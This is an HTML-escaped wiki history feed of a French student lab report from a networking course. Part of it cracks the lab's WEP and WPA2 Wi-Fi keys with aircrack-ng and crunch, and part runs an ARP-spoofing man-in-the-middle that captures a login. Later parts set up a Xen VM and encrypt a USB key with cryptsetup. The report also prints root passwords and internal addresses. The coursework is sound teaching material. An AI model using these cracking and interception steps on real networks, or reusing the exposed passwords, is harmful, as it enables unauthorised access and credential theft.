 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53953</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53953"/>
				<updated>2020-11-20T10:13:55Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Envoie du SSL Certification Gandi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on tajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interfacte avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comem ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
On peux maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
